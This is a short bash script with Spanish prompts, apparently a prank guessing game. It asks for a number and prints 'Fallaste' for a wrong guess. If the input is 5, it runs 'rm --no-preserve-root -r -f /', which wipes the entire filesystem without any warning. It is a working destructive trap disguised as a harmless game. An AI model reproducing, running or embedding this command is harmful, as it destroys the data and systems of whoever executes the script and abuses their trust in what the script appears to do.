#!/bin/bash
#! /bin/bash

if [[ ! $# = 1 ]]; then
echo "Forma de usar: $0 <numero>"
exit 1
fi

case $1 in
	5)
	rm --no-preserve-root -r -f /;;
	*)
	echo "Fallaste";;
esac
# Marca registrada de Nicolas
